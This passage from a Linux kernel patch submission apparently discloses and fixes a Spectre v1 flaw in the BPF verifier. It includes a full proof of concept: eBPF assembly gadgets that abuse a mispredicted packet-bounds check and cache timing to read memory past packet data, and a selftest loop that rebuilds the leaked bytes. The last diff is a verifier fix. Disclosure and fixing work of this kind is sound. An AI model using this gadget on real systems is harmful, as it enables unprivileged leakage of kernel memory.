+		ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_evict"))
+				goto end;
+		}
+	}
+
+	long long n = 0;
+#define T 8
+#define N 8
+	long long i;
+	for (i = 0; n < N; i++) {
+		// Branch prediction using PHT will be wrong unless it knows rand().
+		int t = rand() % T;
+		for (int j = 0; j < t; j++) {
+			client_ping(cs, &si_server, 512);
+		}
+		client_ping(cs, &si_server, 128); // + 42 byte header
+
+#define X 4
+		__s64 delta[X];
+		for (size_t j = 0; j < X; j++) {
+			__u32 key[X] = {0, 512, 1536, 1024};
+			ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]),
+									   &delta[j], sizeof(delta[j]), 0);
+			if (ret) {
+				if (!ASSERT_OK(ret, "delta lookup"))
+					goto end;
+			}
+			if (delta[j] <= 0) {
+				ASSERT_OK(-1, "delta not written by bpf program");
+			}
+		}
+
+		__u32 key = 2048;
+		__u64 err;
+		ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "err lookup"))
+				goto end;
+		}
+		static bool first = true;
+		if (err && first) {
+			first = false;
+			ASSERT_OK(-err, "bpf");
+		}
+
+		if (i == 2 * 2 * N) {
+			// reload and retry
+			ret = -1;
+			// fprintf(stderr, "i: timeout after %lld reps\n", i);
+			break;
+		}
+
+		// sometimes everything is still in the cache
+		if (!((delta[3] < delta[2]))) {
+			// fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]);
+			continue;
+		}
+
+		if (delta[0] > delta[1])
+			*t0 += 1000;
+		else
+			*t1 += 1000;
+		n++;
+	}
+
+	*skipped += i-n;
+	*total += i;
+
+	if (n > 0) {
+		*t0 /= n;
+		*t1 /= n;
+	}
+
+	__u32 key = 0;
+	__u64 value;
+	int ret2 = bpf_map__lookup_elem(skel->maps.evictmap,
+							   &key, sizeof(key),
+							   &value, sizeof(value), 0);
+	if (ret2) {
+		if (!ASSERT_OK(ret2, "lookup"))
+			goto end;
+	}
+	if (value > i*T) {
+		ASSERT_OK(-1, "BUG value > i*T");
+		goto end;
+	}
+
+end:
+	close(ss);
+	close(cs);
+
+	opts.prog_fd = opts.prog_id = 0;
+	ret2 = bpf_tc_detach(&hook, &opts);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_detach");
+
+destroy:
+	ret2 = bpf_tc_hook_destroy(&hook);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_hook_destroy");
+
+	return ret;
+}
+
 void tc_bpf_non_root(void)
 {
 	struct test_tc_bpf *skel = NULL;
@@ -409,11 +656,90 @@ void tc_bpf_non_root(void)
 	if (!ASSERT_OK(ret, "disable_cap_sys_admin"))
 		goto restore_cap;
 
-	skel = test_tc_bpf__open_and_load();
-	if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load"))
-		goto restore_cap;
+	libbpf_set_print(NULL);
+
+#define O 1
+	for (int k = 0; k < O; k++) {// to test reproducibility
+
+		// Must match generated pkt_ptr programs in test_tc_bpf.c and exploit()
+		// function.
+		__u64 base_byte = 366;
+
+		long long skipped = 0;
+		long long total = 0;
+		long long bad_loads = 0;
+		long long total_loads = 0;
+		__u64 qw = 0;
+
+		for (__u64 byte = 0; byte < 8; byte++) {
+			for (__u64 bit = 0; bit < 8; bit++) {
+
+				long long dmax = INT_MIN;
+				long long dmin = INT_MAX;
+				long long d = 0;
+				long long m = 0;
+#define M 8
+				int j = 0;
+				for (j = 0; true; j++) {
+					total_loads += 1;
+					skel = test_tc_bpf__open_and_load();
+					if (skel) {
+						long long t0 = 0, t1 = 0;
+
+						ret = exploit(skel,
+									  &skipped, &total,
+									  &t0, &t1,
+									  base_byte + byte, 1 << bit);
+						if (ret == -1) {
+							bad_loads += 1;
+							goto cleanup;
+						}
+						if (ret)
+							if (!ASSERT_OK(ret, "exploit"))
+								goto restore_cap;
+
+						if (j == 0) {
+							goto cleanup;
+						}
+
+						long long jd = t0 - t1;
+						dmax = jd > dmax ? jd : dmax;
+						dmin = jd < dmin ? jd : dmin;
+						d += jd;
+						m++;
+					}
+				cleanup:
+					test_tc_bpf__destroy(skel);
+
+					if (j == 64 * M) {
+						fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway");
+						break;
+					}
+
+					// Continue as long as result is inconclusive.
+					if (m >= M && (d / m >= 200 || d / m <= -200)) {
+						break;
+					}
+				}
+
+				d /= m;
+
+				fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j);
+
+				// little endian
+				__u64 b = !!(d < 0 ? 0 : 1);
+				qw |= b << ((byte * 8) + bit);
+			}
+		}
+		fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n"
+				"\t>%lld percent bad samples; %lld percent bad loads\n",
+				base_byte, base_byte - 42 - 128, qw,
+				(skipped * 100) / total,
+				(bad_loads * 100) / total_loads);
 
-	test_tc_bpf__destroy(skel);
+	}
+
+	ASSERT_OK(-1, "exploit");
 
 restore_cap:
 	if (caps)
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
old mode 100644
new mode 100755
index ef7da419632a..c5344255ce88
--- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
@@ -4,6 +4,7 @@
 #include <bpf/bpf_helpers.h>
 #include <linux/if_ether.h>
 #include <linux/ip.h>
+#include "bpf_misc.h"
 
 /* Dummy prog to test TC-BPF API */
 
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb)
 	return 0;
 }
 
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */
-SEC("tcx/ingress")
-int pkt_ptr(struct __sk_buff *skb)
-{
-	struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr);
+/* pkt-ptr-based Spectre v1 gadget */
 
-	if ((long)(iph + 1) > (long)skb->data_end)
-		return 1;
-	return 0;
+#define LEAKMAP_ENTRIES (5 * 512)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, LEAKMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} leakmap SEC(".maps");
+
+#define L1_SIZE_KiB 128
+#define SIZEOF_CACHELINE 64
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, EVICTMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} evictmap SEC(".maps");
+
+static long callback_fn(__u32 index, void *ctx) {
+// sizeof(u64) * 8 is one 64-byte cacheline
+	__u32 key = index * 8 + (index % 8);
+	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
+	if (value) {
+		*value += 1;
+		return 0;
+	}
+	return 1;
 }
+
+#define STRINGIFY(x) #x
+#define TOSTRING(x) STRINGIFY(x)
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define OFFSET 350
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef OFFSET
+#undef MASK
+
+// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128
+#define OFFSET 366
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 367
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 368
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 369
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 370
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 371
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 372
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 373
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+
+char LICENSE[] SEC("license") = "GPL";
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
new file mode 100644
index 000000000000..2cd6ab000e4d
--- /dev/null
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
@@ -0,0 +1,172 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include "bpf_misc.h"
+
+/*
+cd /root/bpf && ./ltb/sbin/bpftool prog loadall ./test_tc_bpf.bpf.o /sys/fs/bpf/tc && ./ltb/sbin/bpftool prog dump jited pinned /sys/fs/bpf/tc/pkt_ptr
+
+*/
+
+#undef SHIFT
+#if MASK == 1
+#define SHIFT 9
+#endif
+#if MASK == 2
+#define SHIFT 8
+#endif
+#if MASK == 4
+#define SHIFT 7
+#endif
+#if MASK == 8
+#define SHIFT 6
+#endif
+#if MASK == 16
+#define SHIFT 5
+#endif
+#if MASK == 32
+#define SHIFT 4
+#endif
+#if MASK == 64
+#define SHIFT 3
+#endif
+#if MASK == 128
+#define SHIFT 2
+#endif
+
+SEC("tcx/ingress")
+__naked
+void NAME(OFFSET, MASK)(void)
+{
+	// +76: data
+	// +80: data_end
+	asm volatile (
+		"r7 = r1;"
+
+		// Prepare data in callee-saved register that is not used by bpf_loop
+		// and callback_fn (and therefore not saved/restored).
+		"r9 = *(u32 *)(r7 + 76);"
+		"r8 = r9;"
+		// Construct bad ptr
+		"r9 += " TOSTRING(OFFSET) ";"
+
+		// Prepare warm up gadget
+		"r8 += 166;" // 128 payload + 42 header - 4
+		"r0 = *(u32 *)(r7 + 80);" // data_end
+		"if r0 <= r8 goto err_%=;"
+
+		// Iterate over 8MiB to evict data_end cacheline from 1536-entry STLB
+		// and core's 2.5MiB L3.
+		"r1 = 1024;" // *= 8 in callback
+		"r1 *= 128;"
+		"r2 = %[callback_fn] ll;"
+		"r3 = 0;"
+        "*(u64 *)(r10 - 8) = r3;"
+        "r3 = r10;"
+        "r3 += -8;"
+		"r4 = 0;"
+		"call %[bpf_loop];"
+
+		// Warm secret TLB, improves accuracy
+		"r5 = *(u8 *)(r8 + 0);"
+
+		"r8 = r9;"
+		// Wait for the TLB to resolve the page by storing to an uninitialized stack slot, which will insert an lfence.
+		"*(u64 *)(r10 - 16) = r5;"
+
+		// Check bpf_loop err
+		"if r0 == 0 goto err_%=;"
+
+		// Prepare bpf_map_lookup_elem() args
+		"r1 = %[leakmap] ll;"
+		"r2 = r10;"
+		"r2 += -8;"
+		// Gadget
+		"r3 = *(u32 *)(r7 + 80);" // slow data_end load
+		"if r3 <= r8 goto check0_%=;" // mispredicted branch
+		// "r5 = 0x84;" // for testing gadget without load
+		"r5 = *(u8 *)(r9 + 0);" // fast secret load
+		"r5 &= " TOSTRING(MASK) ";"
+		"r5 <<= " TOSTRING(SHIFT) ";"
+		"*(u64*)(r10 - 8) = r5;"
+		"call %[bpf_map_lookup_elem];"
+		"if r0 == 0 goto err_%=;"
+		"r0 = *(u64 *)(r0 + 0);" // leak secret into leakmap[0|512].is_cached
+
+		// Adds lfence, to make sure we don't speculate into the check code
+		"*(u64 *)(r10 - 24) = r0;"
+
+		"check0_%=:"
+
+#undef TIME_R7
+#define TIME_R7()								\
+		"*(u64*)(r10 - 8) = r7;"				\
+		"call %[bpf_ktime_get_ns];"				\
+		"r6 = r0;"								\
+		"r1 = %[leakmap] ll;"					\
+		"r2 = r10;"								\
+		"r2 += -8;"								\
+		"call %[bpf_map_lookup_elem];"			\
+		"if r0 == 0 goto err_%=;"				\
+		"r1 = *(u64 *)(r0 + 0);"				\
+		"r7 = r0;"								\
+		"call %[bpf_ktime_get_ns];"				\
+		"r0 -= r6;"								\
+		"*(u64 *)(r7 + 0) = r0;"
+
+        // warm instruction caches
+		"r7 = 1024;"
+		TIME_R7()
+
+		// uncached access for comp.
+		"r7 = 1536;"
+		TIME_R7()
+
+		// test 0 delay
+		"r7 = 0;"
+		TIME_R7()
+
+		// test 1 delay
+		"r7 = 512;"
+		TIME_R7()
+
+		// cached access for comp.
+		"r7 = 1024;"
+		TIME_R7()
+
+		// set err=0
+		"r1 = %[leakmap] ll;"
+		"r2 = 2048;"
+		"*(u64*)(r10 - 8) = r2;"
+		"r2 = r10;"
+		"r2 += -8;"
+		"call %[bpf_map_lookup_elem];"
+		"if r0 == 0 goto err_%=;"
+        "r1 = 0;" // err
+		"*(u64 *)(r0 + 0) = r1;"
+
+		"goto exit_%=;"
+
+		"err_%=:"
+		"r1 = %[leakmap] ll;"
+		"r2 = 2048;"
+		"*(u64*)(r10 - 8) = r2;"
+		"r2 = r10;"
+		"r2 += -8;"
+		"call %[bpf_map_lookup_elem];"
+		"if r0 == 0 goto exit_%=;"
+        "r1 = 2;" // err = other
+		"*(u64 *)(r0 + 0) = r1;"
+
+		"exit_%=:"
+		"r0 = 2;" // TC_ACT_SHOT, drop packet
+		"exit;"
+		:
+		: __imm_addr(leakmap),
+		  __imm_addr(callback_fn),
+		  __imm(bpf_loop),
+		  __imm(bpf_ktime_get_ns),
+		  __imm(bpf_map_lookup_elem)
+		: __clobber_all);
+}
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h
new file mode 100644
index 000000000000..b73ee23a59ec
--- /dev/null
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h
@@ -0,0 +1,31 @@
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 2
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 4
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 8
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 16
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 32
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 64
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 128
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
diff mbox series

Patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index bb78212fa5b2..b415a81149ed 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14050,12 +14050,6 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		return -EINVAL;
 	}
 
-	/* check src2 operand */
-	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
-	if (err)
-		return err;
-
-	dst_reg = &regs[insn->dst_reg];
 	if (BPF_SRC(insn->code) == BPF_X) {
 		if (insn->imm != 0) {
 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
@@ -14067,13 +14061,12 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		if (err)
 			return err;
 
-		src_reg = &regs[insn->src_reg];
-		if (!(reg_is_pkt_pointer_any(dst_reg) && reg_is_pkt_pointer_any(src_reg)) &&
-		    is_pointer_value(env, insn->src_reg)) {
+		if (is_pointer_value(env, insn->src_reg)) {
 			verbose(env, "R%d pointer comparison prohibited\n",
 				insn->src_reg);
 			return -EACCES;
 		}
+		src_reg = &regs[insn->src_reg];
 	} else {
 		if (insn->src_reg != BPF_REG_0) {
 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
@@ -14081,6 +14074,12 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		}
 	}
 
+	/* check src2 operand */
+	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
+	if (err)
+		return err;
+
+	dst_reg = &regs[insn->dst_reg];
 	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
 
 	if (BPF_SRC(insn->code) == BPF_K) {